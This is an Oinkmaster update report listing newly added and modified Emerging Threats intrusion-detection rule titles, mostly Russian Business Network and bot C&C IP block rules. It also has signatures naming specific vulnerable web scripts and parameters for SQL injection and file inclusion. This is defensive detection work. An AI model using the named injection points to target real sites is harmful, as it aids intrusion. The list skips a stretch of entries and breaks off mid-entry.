Message-ID: <20090815220012.828434504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat Aug 15 18:00:12 2009 [***]

[+++] Added rules: [+++]

2002801 - ET POLICY Google Desktop User-Agent Detected (emerging-policy.rules)
2002838 - ET POLICY Google Search Appliance browsing the Internet (emerging-policy.rules)
2003634 - ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan (emerging-scan.rules) 2009714 - ET WEB Script tag in URI, Possible Cross Site Scripting Attempt (emerging-web.rules) 2009715 - ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt (emerging-web.rules) 2009716 - ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection (emerging-web_sql_injection.rules) 2009717 - ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009718 - ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection (emerging-web_sql_injection.rules) 2009719 - ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion (emerging-web_sql_injection.rules) 2009720 - ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion (emerging-web_sql_injection.rules) 2009723 - ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009724 - ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009725 - ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow (emerging-web.rules) 2009726 - ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009727 - ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection (emerging-web_sql_injection.rules) 2009728 - ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009729 - ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009730 - ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection (emerging-web_sql_injection.rules) 2009731 - ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection (emerging-web_sql_injection.rules) 
2009733 - ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009734 - ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection (emerging-web_sql_injection.rules) 2009735 - ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow (emerging-web.rules) 2009736 - ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal (emerging-web_sql_injection.rules) 2009737 - ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete (emerging-web_sql_injection.rules) 2009738 - ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection (emerging-web_sql_injection.rules) 2009739 - ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection (emerging-web_sql_injection.rules) 2009740 - ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection (emerging-web_sql_injection.rules) 2009741 - ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection (emerging-web_sql_injection.rules) 2009742 - ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection (emerging-web_sql_injection.rules) 2009743 - ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009744 - ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection (emerging-web_sql_injection.rules) 2009745 - ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009746 - ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009747 - ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection (emerging-web_sql_injection.rules) 2009748 - ET WEB Possible Wordpress Administrative Password Reset Vulnerability (emerging-web.rules) 2009749 - ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan 
(emerging-scan.rules) 2404025 - ET DROP Known Bot C&C Server Traffic (group 26) (emerging-botcc.rules) 2405025 - ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2406730 - ET RBN Known Russian Business Network IP TCP (366) (emerging-rbn.rules) 2406731 - ET RBN Known Russian Business Network IP UDP (366) (emerging-rbn.rules) 2406732 - ET RBN Known Russian Business Network IP TCP (367) (emerging-rbn.rules) 2406733 - ET RBN Known Russian Business Network IP UDP (367) (emerging-rbn.rules) 2406734 - ET RBN Known Russian Business Network IP TCP (368) (emerging-rbn.rules) 2406735 - ET RBN Known Russian Business Network IP UDP (368) (emerging-rbn.rules) 2406736 - ET RBN Known Russian Business Network IP TCP (369) (emerging-rbn.rules) 2406737 - ET RBN Known Russian Business Network IP UDP (369) (emerging-rbn.rules) 2406738 - ET RBN Known Russian Business Network IP TCP (370) (emerging-rbn.rules) 2406739 - ET RBN Known Russian Business Network IP UDP (370) (emerging-rbn.rules) 2406740 - ET RBN Known Russian Business Network IP TCP (371) (emerging-rbn.rules) 2406741 - ET RBN Known Russian Business Network IP UDP (371) (emerging-rbn.rules) 2406742 - ET RBN Known Russian Business Network IP TCP (372) (emerging-rbn.rules) 2406743 - ET RBN Known Russian Business Network IP UDP (372) (emerging-rbn.rules) 2406744 - ET RBN Known Russian Business Network IP TCP (373) (emerging-rbn.rules) 2406745 - ET RBN Known Russian Business Network IP UDP (373) (emerging-rbn.rules) 2406746 - ET RBN Known Russian Business Network IP TCP (374) (emerging-rbn.rules) 2406747 - ET RBN Known Russian Business Network IP UDP (374) (emerging-rbn.rules) 2406748 - ET RBN Known Russian Business Network IP TCP (375) (emerging-rbn.rules) 2406749 - ET RBN Known Russian Business Network IP UDP (375) (emerging-rbn.rules) 2406750 - ET RBN Known Russian Business Network IP TCP (376) (emerging-rbn.rules) 2406751 - ET RBN Known Russian Business Network IP UDP (376) 
(emerging-rbn.rules) 2406752 - ET RBN Known Russian Business Network IP TCP (377) (emerging-rbn.rules) 2406753 - ET RBN Known Russian Business Network IP UDP (377) (emerging-rbn.rules) 2406754 - ET RBN Known Russian Business Network IP TCP (378) (emerging-rbn.rules) 2406755 - ET RBN Known Russian Business Network IP UDP (378) (emerging-rbn.rules) 2406756 - ET RBN Known Russian Business Network IP TCP (379) (emerging-rbn.rules) 2406757 - ET RBN Known Russian Business Network IP UDP (379) (emerging-rbn.rules) 2406758 - ET RBN Known Russian Business Network IP TCP (380) (emerging-rbn.rules) 2406759 - ET RBN Known Russian Business Network IP UDP (380) (emerging-rbn.rules) 2406760 - ET RBN Known Russian Business Network IP TCP (381) (emerging-rbn.rules) 2406761 - ET RBN Known Russian Business Network IP UDP (381) (emerging-rbn.rules) 2406762 - ET RBN Known Russian Business Network IP TCP (382) (emerging-rbn.rules) 2406763 - ET RBN Known Russian Business Network IP UDP (382) (emerging-rbn.rules) 2406764 - ET RBN Known Russian Business Network IP TCP (383) (emerging-rbn.rules) 2406765 - ET RBN Known Russian Business Network IP UDP (383) (emerging-rbn.rules) 2406766 - ET RBN Known Russian Business Network IP TCP (384) (emerging-rbn.rules) 2406767 - ET RBN Known Russian Business Network IP UDP (384) (emerging-rbn.rules) 2406768 - ET RBN Known Russian Business Network IP TCP (385) (emerging-rbn.rules) 2406769 - ET RBN Known Russian Business Network IP UDP (385) (emerging-rbn.rules) 2406770 - ET RBN Known Russian Business Network IP TCP (386) (emerging-rbn.rules) 2406771 - ET RBN Known Russian Business Network IP UDP (386) (emerging-rbn.rules) 2406772 - ET RBN Known Russian Business Network IP TCP (387) (emerging-rbn.rules) 2406773 - ET RBN Known Russian Business Network IP UDP (387) (emerging-rbn.rules) 2406774 - ET RBN Known Russian Business Network IP TCP (388) (emerging-rbn.rules) 2406775 - ET RBN Known Russian Business Network IP UDP (388) (emerging-rbn.rules) 2407730 - 
ET RBN Known Russian Business Network IP TCP - BLOCKING (366) (emerging-rbn-BLOCK.rules) 2407731 - ET RBN Known Russian Business Network IP UDP - BLOCKING (366) (emerging-rbn-BLOCK.rules) 2407732 - ET RBN Known Russian Business Network IP TCP - BLOCKING (367) (emerging-rbn-BLOCK.rules) 2407733 - ET RBN Known Russian Business Network IP UDP - BLOCKING (367) (emerging-rbn-BLOCK.rules) 2407734 - ET RBN Known Russian Business Network IP TCP - BLOCKING (368) (emerging-rbn-BLOCK.rules) 2407735 - ET RBN Known Russian Business Network IP UDP - BLOCKING (368) (emerging-rbn-BLOCK.rules) 2407736 - ET RBN Known Russian Business Network IP TCP - BLOCKING (369) (emerging-rbn-BLOCK.rules) 2407737 - ET RBN Known Russian Business Network IP UDP - BLOCKING (369) (emerging-rbn-BLOCK.rules) 2407738 - ET RBN Known Russian Business Network IP TCP - BLOCKING (370) (emerging-rbn-BLOCK.rules) 2407739 - ET RBN Known Russian Business Network IP UDP - BLOCKING (370) (emerging-rbn-BLOCK.rules) 2407740 - ET RBN Known Russian Business Network IP TCP - BLOCKING (371) (emerging-rbn-BLOCK.rules) 2407741 - ET RBN Known Russian Business Network IP UDP - BLOCKING (371) (emerging-rbn-BLOCK.rules) 2407742 - ET RBN Known Russian Business Network IP TCP - BLOCKING (372) (emerging-rbn-BLOCK.rules) 2407743 - ET RBN Known Russian Business Network IP UDP - BLOCKING (372) (emerging-rbn-BLOCK.rules) 2407744 - ET RBN Known Russian Business Network IP TCP - BLOCKING (373) (emerging-rbn-BLOCK.rules) 2407745 - ET RBN Known Russian Business Network IP UDP - BLOCKING (373) (emerging-rbn-BLOCK.rules) 2407746 - ET RBN Known Russian Business Network IP TCP - BLOCKING (374) (emerging-rbn-BLOCK.rules) 2407747 - ET RBN Known Russian Business Network IP UDP - BLOCKING (374) (emerging-rbn-BLOCK.rules) 2407748 - ET RBN Known Russian Business Network IP TCP - BLOCKING (375) (emerging-rbn-BLOCK.rules) 2407749 - ET RBN Known Russian Business Network IP UDP - BLOCKING (375) (emerging-rbn-BLOCK.rules) 2407750 - ET RBN Known 
Russian Business Network IP TCP - BLOCKING (376) (emerging-rbn-BLOCK.rules) 2407751 - ET RBN Known Russian Business Network IP UDP - BLOCKING (376) (emerging-rbn-BLOCK.rules) 2407752 - ET RBN Known Russian Business Network IP TCP - BLOCKING (377) (emerging-rbn-BLOCK.rules) 2407753 - ET RBN Known Russian Business Network IP UDP - BLOCKING (377) (emerging-rbn-BLOCK.rules) 2407754 - ET RBN Known Russian Business Network IP TCP - BLOCKING (378) (emerging-rbn-BLOCK.rules) 2407755 - ET RBN Known Russian Business Network IP UDP - BLOCKING (378) (emerging-rbn-BLOCK.rules) 2407756 - ET RBN Known Russian Business Network IP TCP - BLOCKING (379) (emerging-rbn-BLOCK.rules) 2407757 - ET RBN Known Russian Business Network IP UDP - BLOCKING (379) (emerging-rbn-BLOCK.rules) 2407758 - ET RBN Known Russian Business Network IP TCP - BLOCKING (380) (emerging-rbn-BLOCK.rules) 2407759 - ET RBN Known Russian Business Network IP UDP - BLOCKING (380) (emerging-rbn-BLOCK.rules) 2407760 - ET RBN Known Russian Business Network IP TCP - BLOCKING (381) (emerging-rbn-BLOCK.rules) 2407761 - ET RBN Known Russian Business Network IP UDP - BLOCKING (381) (emerging-rbn-BLOCK.rules) 2407762 - ET RBN Known Russian Business Network IP TCP - BLOCKING (382) (emerging-rbn-BLOCK.rules) 2407763 - ET RBN Known Russian Business Network IP UDP - BLOCKING (382) (emerging-rbn-BLOCK.rules) 2407764 - ET RBN Known Russian Business Network IP TCP - BLOCKING (383) (emerging-rbn-BLOCK.rules) 2407765 - ET RBN Known Russian Business Network IP UDP - BLOCKING (383) (emerging-rbn-BLOCK.rules) 2407766 - ET RBN Known Russian Business Network IP TCP - BLOCKING (384) (emerging-rbn-BLOCK.rules) 2407767 - ET RBN Known Russian Business Network IP UDP - BLOCKING (384) (emerging-rbn-BLOCK.rules) 2407768 - ET RBN Known Russian Business Network IP TCP - BLOCKING (385) (emerging-rbn-BLOCK.rules) 2407769 - ET RBN Known Russian Business Network IP UDP - BLOCKING (385) (emerging-rbn-BLOCK.rules) 2407770 - ET RBN Known Russian Business 
Network IP TCP - BLOCKING (386) (emerging-rbn-BLOCK.rules)
2407771 - ET RBN Known Russian Business Network IP UDP - BLOCKING (386) (emerging-rbn-BLOCK.rules)
2407772 - ET RBN Known Russian Business Network IP TCP - BLOCKING (387) (emerging-rbn-BLOCK.rules)
2407773 - ET RBN Known Russian Business Network IP UDP - BLOCKING (387) (emerging-rbn-BLOCK.rules)
2407774 - ET RBN Known Russian Business Network IP TCP - BLOCKING (388) (emerging-rbn-BLOCK.rules)
2407775 - ET RBN Known Russian Business Network IP UDP - BLOCKING (388) (emerging-rbn-BLOCK.rules)

[///] Modified active rules: [///]

2001239 - ET POLICY Cisco Device in Config Mode (emerging-policy.rules)
2001240 - ET POLICY Cisco Device New Config Built (emerging-policy.rules)
2002849 - ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet (emerging-web_sql_injection.rules)
2009701 - ET CURRENT_EVENTS DNS BIND 9 Dynamic Update DoS attempt (emerging.rules)
2009711 - ET TROJAN Win32.Runner (Often Rootkit) - POST (emerging-virus.rules)
2009712 - ET MALWARE Adware PlusDream - GET Config Download/Update (emerging-malware.rules)
2009713 - ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected (emerging.rules)
2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules)
2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules)
2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules)
2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules)
2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules)
2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules)
2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules)
2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules)
2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules)
2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules)
2404008 
- ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules) 2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules) 2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules) 2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules) 2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules) 2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules) 2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules) 2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules) 2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules) 2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules) 2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules) 2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules) 2404020 - ET DROP Known Bot C&C Server Traffic (group 21) (emerging-botcc.rules) 2404021 - ET DROP Known Bot C&C Server Traffic (group 22) (emerging-botcc.rules) 2404022 - ET DROP Known Bot C&C Server Traffic (group 23) (emerging-botcc.rules) 2404023 - ET DROP Known Bot C&C Server Traffic (group 24) (emerging-botcc.rules) 2404024 - ET DROP Known Bot C&C Server Traffic (group 25) (emerging-botcc.rules) 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405006 - ET DROP Known Bot C&C Traffic (group 7) 
- BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405024 - ET DROP Known Bot C&C Traffic (group 25) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2406000 - ET RBN Known Russian Business Network IP TCP (1) (emerging-rbn.rules) 2406001 - ET RBN Known Russian Business Network IP UDP (1) (emerging-rbn.rules) 2406002 - ET RBN Known Russian 
Business Network IP TCP (2) (emerging-rbn.rules) 2406003 - ET RBN Known Russian Business Network IP UDP (2) (emerging-rbn.rules) 2406004 - ET RBN Known Russian Business Network IP TCP (3) (emerging-rbn.rules) 2406005 - ET RBN Known Russian Business Network IP UDP (3) (emerging-rbn.rules) 2406006 - ET RBN Known Russian Business Network IP TCP (4) (emerging-rbn.rules) 2406007 - ET RBN Known Russian Business Network IP UDP (4) (emerging-rbn.rules) 2406008 - ET RBN Known Russian Business Network IP TCP (5) (emerging-rbn.rules) 2406009 - ET RBN Known Russian Business Network IP UDP (5) (emerging-rbn.rules) 2406010 - ET RBN Known Russian Business Network IP TCP (6) (emerging-rbn.rules) 2406011 - ET RBN Known Russian Business Network IP UDP (6) (emerging-rbn.rules) 2406012 - ET RBN Known Russian Business Network IP TCP (7) (emerging-rbn.rules) 2406013 - ET RBN Known Russian Business Network IP UDP (7) (emerging-rbn.rules) 2406014 - ET RBN Known Russian Business Network IP TCP (8) (emerging-rbn.rules) 2406015 - ET RBN Known Russian Business Network IP UDP (8) (emerging-rbn.rules) 2406016 - ET RBN Known Russian Business Network IP TCP (9) (emerging-rbn.rules) 2406017 - ET RBN Known Russian Business Network IP UDP (9) (emerging-rbn.rules) 2406018 - ET RBN Known Russian Business Network IP TCP (10) (emerging-rbn.rules) 2406019 - ET RBN Known Russian Business Network IP UDP (10) (emerging-rbn.rules) 2406020 - ET RBN Known Russian Business Network IP TCP (11) (emerging-rbn.rules) 2406021 - ET RBN Known Russian Business Network IP UDP (11) (emerging-rbn.rules) 2406022 - ET RBN Known Russian Business Network IP TCP (12) (emerging-rbn.rules) 2406023 - ET RBN Known Russian Business Network IP UDP (12) (emerging-rbn.rules) 2406024 - ET RBN Known Russian Business Network IP TCP (13) (emerging-rbn.rules) 2406025 - ET RBN Known Russian Business Network IP UDP (13) (emerging-rbn.rules) 2406026 - ET RBN Known Russian Business Network IP TCP (14) (emerging-rbn.rules) 2406027 - ET RBN 
Known Russian Business Network IP UDP (14) (emerging-rbn.rules) 2406028 - ET RBN Known Russian Business Network IP TCP (15) (emerging-rbn.rules) 2406029 - ET RBN Known Russian Business Network IP UDP (15) (emerging-rbn.rules) 2406030 - ET RBN Known Russian Business Network IP TCP (16) (emerging-rbn.rules) 2406031 - ET RBN Known Russian Business Network IP UDP (16) (emerging-rbn.rules) 2406032 - ET RBN Known Russian Business Network IP TCP (17) (emerging-rbn.rules) 2406033 - ET RBN Known Russian Business Network IP UDP (17) (emerging-rbn.rules) 2406034 - ET RBN Known Russian Business Network IP TCP (18) (emerging-rbn.rules) 2406035 - ET RBN Known Russian Business Network IP UDP (18) (emerging-rbn.rules) 2406036 - ET RBN Known Russian Business Network IP TCP (19) (emerging-rbn.rules) 2406037 - ET RBN Known Russian Business Network IP UDP (19) (emerging-rbn.rules) 2406038 - ET RBN Known Russian Business Network IP TCP (20) (emerging-rbn.rules) 2406039 - ET RBN Known Russian Business Network IP UDP (20) (emerging-rbn.rules) 2406040 - ET RBN Known Russian Business Network IP TCP (21) (emerging-rbn.rules) 2406041 - ET RBN Known Russian Business Network IP UDP (21) (emerging-rbn.rules) 2406042 - ET RBN Known Russian Business Network IP TCP (22) (emerging-rbn.rules) 2406043 - ET RBN Known Russian Business Network IP UDP (22) (emerging-rbn.rules) 2406044 - ET RBN Known Russian Business Network IP TCP (23) (emerging-rbn.rules) 2406045 - ET RBN Known Russian Business Network IP UDP (23) (emerging-rbn.rules) 2406046 - ET RBN Known Russian Business Network IP TCP (24) (emerging-rbn.rules) 2406047 - ET RBN Known Russian Business Network IP UDP (24) (emerging-rbn.rules) 2406048 - ET RBN Known Russian Business Network IP TCP (25) (emerging-rbn.rules) 2406049 - ET RBN Known Russian Business Network IP UDP (25) (emerging-rbn.rules) 2406050 - ET RBN Known Russian Business Network IP TCP (26) (emerging-rbn.rules) 2406051 - ET RBN Known Russian Business Network IP UDP (26) 
(emerging-rbn.rules) 2406052 - ET RBN Known Russian Business Network IP TCP (27) (emerging-rbn.rules) 2406053 - ET RBN Known Russian Business Network IP UDP (27) (emerging-rbn.rules) 2406054 - ET RBN Known Russian Business Network IP TCP (28) (emerging-rbn.rules) 2406055 - ET RBN Known Russian Business Network IP UDP (28) (emerging-rbn.rules) 2406056 - ET RBN Known Russian Business Network IP TCP (29) (emerging-rbn.rules) 2406057 - ET RBN Known Russian Business Network IP UDP (29) (emerging-rbn.rules) 2406058 - ET RBN Known Russian Business Network IP TCP (30) (emerging-rbn.rules) 2406059 - ET RBN Known Russian Business Network IP UDP (30) (emerging-rbn.rules) 2406060 - ET RBN Known Russian Business Network IP TCP (31) (emerging-rbn.rules) 2406061 - ET RBN Known Russian Business Network IP UDP (31) (emerging-rbn.rules) 2406062 - ET RBN Known Russian Business Network IP TCP (32) (emerging-rbn.rules) 2406063 - ET RBN Known Russian Business Network IP UDP (32) (emerging-rbn.rules) 2406064 - ET RBN Known Russian Business Network IP TCP (33) (emerging-rbn.rules) 2406065 - ET RBN Known Russian Business Network IP UDP (33) (emerging-rbn.rules) 2406066 - ET RBN Known Russian Business Network IP TCP (34) (emerging-rbn.rules) 2406067 - ET RBN Known Russian Business Network IP UDP (34) (emerging-rbn.rules) 2406068 - ET RBN Known Russian Business Network IP TCP (35) (emerging-rbn.rules) 2406069 - ET RBN Known Russian Business Network IP UDP (35) (emerging-rbn.rules) 2406070 - ET RBN Known Russian Business Network IP TCP (36) (emerging-rbn.rules) 2406071 - ET RBN Known Russian Business Network IP UDP (36) (emerging-rbn.rules) 2406072 - ET RBN Known Russian Business Network IP TCP (37) (emerging-rbn.rules) 2406073 - ET RBN Known Russian Business Network IP UDP (37) (emerging-rbn.rules) 2406074 - ET RBN Known Russian Business Network IP TCP (38) (emerging-rbn.rules) 2406075 - ET RBN Known Russian Business Network IP UDP (38) (emerging-rbn.rules) 2406076 - ET RBN Known Russian 
Business Network IP TCP (39) (emerging-rbn.rules) 2406077 - ET RBN Known Russian Business Network IP UDP (39) (emerging-rbn.rules) 2406078 - ET RBN Known Russian Business Network IP TCP (40) (emerging-rbn.rules) 2406079 - ET RBN Known Russian Business Network IP UDP (40) (emerging-rbn.rules) 2406080 - ET RBN Known Russian Business Network IP TCP (41) (emerging-rbn.rules) 2406081 - ET RBN Known Russian Business Network IP UDP (41) (emerging-rbn.rules) 2406082 - ET RBN Known Russian Business Network IP TCP (42) (emerging-rbn.rules) 2406083 - ET RBN Known Russian Business Network IP UDP (42) (emerging-rbn.rules) 2406084 - ET RBN Known Russian Business Network IP TCP (43) (emerging-rbn.rules) 2406085 - ET RBN Known Russian Business Network IP UDP (43) (emerging-rbn.rules) 2406086 - ET RBN Known Russian Business Network IP TCP (44) (emerging-rbn.rules) 2406087 - ET RBN Known Russian Business Network IP UDP (44) (emerging-rbn.rules) 2406088 - ET RBN Known Russian Business Network IP TCP (45) (emerging-rbn.rules) 2406089 - ET RBN Known Russian Business Network IP UDP (45) (emerging-rbn.rules) 2406090 - ET RBN Known Russian Business Network IP TCP (46) (emerging-rbn.rules) 2406091 - ET RBN Known Russian Business Network IP UDP (46) (emerging-rbn.rules) 2406092 - ET RBN Known Russian Business Network IP TCP (47) (emerging-rbn.rules) 2406093 - ET RBN Known Russian Business Network IP UDP (47) (emerging-rbn.rules) 2406094 - ET RBN Known Russian Business Network IP TCP (48) (emerging-rbn.rules) 2406095 - ET RBN Known Russian Business Network IP UDP (48) (emerging-rbn.rules) 2406096 - ET RBN Known Russian Business Network IP TCP (49) (emerging-rbn.rules) 2406097 - ET RBN Known Russian Business Network IP UDP (49) (emerging-rbn.rules) 2406098 - ET RBN Known Russian Business Network IP TCP (50) (emerging-rbn.rules) 2406099 - ET RBN Known Russian Business Network IP UDP (50) (emerging-rbn.rules) 2406100 - ET RBN Known Russian Business Network IP TCP (51) (emerging-rbn.rules) 
(emerging-rbn.rules) 2406589 - ET RBN Known Russian Business Network IP UDP (295) (emerging-rbn.rules) 2406590 - ET RBN Known Russian Business Network IP TCP (296) (emerging-rbn.rules) 2406591 - ET RBN Known Russian Business Network IP UDP (296) (emerging-rbn.rules) 2406592 - ET RBN Known Russian Business Network IP TCP (297) (emerging-rbn.rules) 2406593 - ET RBN Known Russian Business Network IP UDP (297) (emerging-rbn.rules) 2406594 - ET RBN Known Russian Business Network IP TCP (298) (emerging-rbn.rules) 2406595 - ET RBN Known Russian Business Network IP UDP (298) (emerging-rbn.rules) 2406596 - ET RBN Known Russian Business Network IP TCP (299) (emerging-rbn.rules) 2406597 - ET RBN Known Russian Business Network IP UDP (299) (emerging-rbn.rules) 2406598 - ET RBN Known Russian Business Network IP TCP (300) (emerging-rbn.rules) 2406599 - ET RBN Known Russian Business Network IP UDP (300) (emerging-rbn.rules) 2406600 - ET RBN Known Russian Business Network IP TCP (301) (emerging-rbn.rules) 2406601 - ET RBN Known Russian Business Network IP UDP (301) (emerging-rbn.rules) 2406602 - ET RBN Known Russian Business Network IP TCP (302) (emerging-rbn.rules) 2406603 - ET RBN Known Russian Business Network IP UDP (302) (emerging-rbn.rules) 2406604 - ET RBN Known Russian Business Network IP TCP (303) (emerging-rbn.rules) 2406605 - ET RBN Known Russian Business Network IP UDP (303) (emerging-rbn.rules) 2406606 - ET RBN Known Russian Business Network IP TCP (304) (emerging-rbn.rules) 2406607 - ET RBN Known Russian Business Network IP UDP (304) (emerging-rbn.rules) 2406608 - ET RBN Known Russian Business Network IP TCP (305) (emerging-rbn.rules) 2406609 - ET RBN Known Russian Business Network IP UDP (305) (emerging-rbn.rules) 2406610 - ET RBN Known Russian Business Network IP TCP (306) (emerging-rbn.rules) 2406611 - ET RBN Known Russian Business Network IP UDP (306) (emerging-rbn.rules) 2406612 - ET RBN Known Russian Business Network IP TCP (307) (emerging-rbn.rules) 2406613 - 
ET RBN Known Russian Business Network IP UDP (307) (emerging-rbn.rules) 2406614 - ET RBN Known Russian Business Network IP TCP (308) (emerging-rbn.rules) 2406615 - ET RBN Known Russian Business Network IP UDP (308) (emerging-rbn.rules) 2406616 - ET RBN Known Russian Business Network IP TCP (309) (emerging-rbn.rules) 2406617 - ET RBN Known Russian Business Network IP UDP (309) (emerging-rbn.rules) 2406618 - ET RBN Known Russian Business Network IP TCP (310) (emerging-rbn.rules) 2406619 - ET RBN Known Russian Business Network IP UDP (310) (emerging-rbn.rules) 2406620 - ET RBN Known Russian Business Network IP TCP (311) (emerging-rbn.rules) 2406621 - ET RBN Known Russian Business Network IP UDP (311) (emerging-rbn.rules) 2406622 - ET RBN Known Russian Business Network IP TCP (312) (emerging-rbn.rules) 2406623 - ET RBN Known Russian Business Network IP UDP (312) (emerging-rbn.rules) 2406624 - ET RBN Known Russian Business Network IP TCP (313) (emerging-rbn.rules) 2406625 - ET RBN Known Russian Business Network IP UDP (313) (emerging-rbn.rules) 2406626 - ET RBN Known 